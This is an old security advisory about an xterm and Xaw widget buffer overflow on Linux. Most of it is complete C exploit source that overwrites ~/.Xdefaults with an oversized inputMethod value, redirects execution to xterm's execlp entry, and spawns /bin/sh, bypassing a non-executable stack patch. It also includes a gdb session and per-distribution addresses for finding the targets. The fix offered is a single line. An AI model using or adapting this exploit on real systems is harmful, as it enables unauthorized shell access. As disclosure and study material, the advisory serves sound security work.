COMMAND

    xterm

SYSTEMS AFFECTED

    Linux

PROBLEM

    M.C.Mar developed an exploit that works around the non-executable
    stack patch (Linux), for the xterm and Xaw vulnerability.  It seems
    that defeating Solar's stack patch is easier than we thought if the
    program contains any exec* PLT entry.  If it contains exec*p we may
    use any string to execute ./_anystring_ if we have . in the PATH
    variable.  This exploit simply puts the EXECLP address and its
    parameters' addresses onto the stack.  To work, you need to look for
    the execlp Procedure Linkage Table entry in xterm and for the
    "/bin/sh" string in its text segment...

        emsi:~mcmar/hack# gdb xterm
        GDB is free software and you are welcome to distribute copies of it
         under certain conditions; type "show copying" to see the conditions.
        There is absolutely no warranty for GDB; type "show warranty" for details.
        GDB 4.16 (i486-slackware-linux),
        Copyright 1996 Free Software Foundation, Inc...(no debugging symbols found)...
        (gdb) print execlp
        $1 = {<text variable, no debug info>} 0x804bc78 <execlp>
        (gdb) x/s 0x8063d2e
        0x8063d2e <_fini+8158>:  "/bin/sh"

    0x804bc78 and 0x8063d2e were correct in the tested case, but you may
    need to look for the right ones in your case.  M.C.Mar later added:

    In slackware (3.4): EXECLP should be 0x804bc78, and BIN_SH - 0x8063d2e;
    In Redhat (5.0) : EXECLP should be 0x804b1cc, and BIN_SH - 0x80626f2;

    Exploit follows:

    /*
     Based  on  Solar   Designer's:  "Getting  around   non-executable
     stack(fix)"  post   and:   Rafał   Wojtczuk's  "Defeating   Solar
     Designer's Non-executable Stack Patch"

     sploit by  Kil3r of  Lam3rZ against  both Xaw  and neXtaw widgets
     based on xterm_exp.c by alcuin

     Compile it like this:
     gcc 3xterm.c -L /usr/X11/lib/ -lXaw -lXmu -lXt -lSM -lICE -lXext -lX11 -lc

     GreetZ: bulba, smierc, all of  Lam3rZ team and other Polish HackerZ ;)
    */

    #include <stdlib.h>
    #include <stdio.h>
    #include <ctype.h>


    #define CONFFILE ".Xdefaults"      /* X resource file, relative to $HOME (main() chdir()s there) */
    #define OLDFILE ".Xdefaults.old"   /* backup copy of CONFFILE taken before it is replaced */
    #define NEWFILE ".Xdefaults.new"   /* rewritten resource file, later moved over CONFFILE */

    /* Both values are specific to one xterm binary (the gdb session in the
       advisory text shows how they were obtained) and differ per
       distribution/build, as the Slackware vs. Redhat note above shows. */
    #define EXECLP 0x804bc78  // execlp PLT address in xterm
    #define BIN_SH 0x8063d2e  // "/bin/sh" string address in xterm ;)


    /* Write cursor used by main() to store the address words into shellbuf.
       It is an int pointer, so this appears to assume 32-bit ints and
       addresses (the advisory targets i486 Linux). */
    int *ptr;

    /*
     * Entry point.  Rewrites $HOME/.Xdefaults so that the xterm*inputMethod
     * resource carries an oversized value, then runs xterm so that it parses
     * the new file.  The value is 0x90 filler with the EXECLP/BIN_SH words at
     * offset 1028, i.e. control is redirected to an existing PLT entry rather
     * than to code placed on the stack — which is why the non-executable
     * stack patch does not help here (see the advisory text above).
     * argc/argv are unused.
     *
     * Note: `void main` is non-standard, and strncmp/memset (<string.h>) and
     * chdir/execl (<unistd.h>) are used without their headers being
     * included, so they are implicitly declared.
     */
    void main(int argc, char *argv[]) {

      char *home;
      FILE *f_in, *f_out;
      char buff[16384];      /* one line of the existing config */
      char shellbuf[16384];  /* the oversized resource value */
      char *s;
      int i;                 /* unused */


      /* Work from the home directory so the relative file names below
         resolve there.  The assignment in the condition is intentional;
         a chdir() failure is ignored. */
      if (home = getenv("HOME")) chdir(home);

      /* The replacement config is built in NEWFILE first. */
      if (!(f_out = fopen(NEWFILE, "w"))) {
        perror("fopen");
        exit(1);
      }



      /* Copy the existing config into NEWFILE, filtering out the
         xterm*inputMethod line so the one appended below is the only one.
         If there is no existing CONFFILE this step is skipped entirely. */
      if (f_in = fopen(CONFFILE, "r")) {
        fseek(f_in,0,SEEK_SET);
        /* feof() only becomes true after a read has failed, and the fgets()
           result is not checked, so the last line of the file is written
           out twice. */
        while (!feof(f_in)) {
          fgets(buff,16384,f_in);
          /* skip leading blanks (isblank() is given a plain char, which may
             be negative for non-ASCII bytes) */
          for (s=buff;isblank(*s);s++);
          /* NOTE(review): `< 0` keeps only lines that compare less than the
             prefix; lines that compare greater are dropped as well, not
             just the matching one. */
          if (strncmp(s,"xterm*inputMethod",17)<0)
            fputs(buff,f_out);
        }
        fclose(f_in);
      }

      /* fill the buffer with nops */
      memset(shellbuf, 0x90, sizeof(shellbuf));
      shellbuf[sizeof(shellbuf)-1] = 0;


      /* Store the address words starting at offset 1028: per the advisory
         text, the execlp PLT address and the address of its "/bin/sh"
         argument.  The final zero word also NUL-terminates the string at
         offset 1044, so fputs() below emits only the first 1044 bytes of
         shellbuf; the rest of the filler is never written. */
      ptr = (int *)(shellbuf+1028);
      *ptr++ =EXECLP;
      *ptr++ =EXECLP;
      *ptr++ =BIN_SH;
      *ptr++ =BIN_SH;
      *ptr++ = 0;


      /* Emit the resource line; no trailing newline is written. */
      fputs("xterm*inputMethod:",f_out);
      fputs(shellbuf, f_out);
      fclose(f_out);  /* return value unchecked */

      /* Back up the old file and install the new one.  Both commands are
         built solely from the compile-time names above, so nothing
         user-controlled reaches the shell; their exit status is ignored
         (e.g. cp fails when CONFFILE does not exist yet). */
      system("/bin/cp "CONFFILE" "OLDFILE);
      system("/bin/mv -f "NEWFILE" "CONFFILE);

      /* Replace this process with xterm, which reads the new .Xdefaults.
         execl() only returns on failure, and that case is not reported. */
      execl("/usr/X11R6/bin/xterm","xterm",NULL);
    }

SOLUTION

    A newer release of X is believed to have fixed this overflow.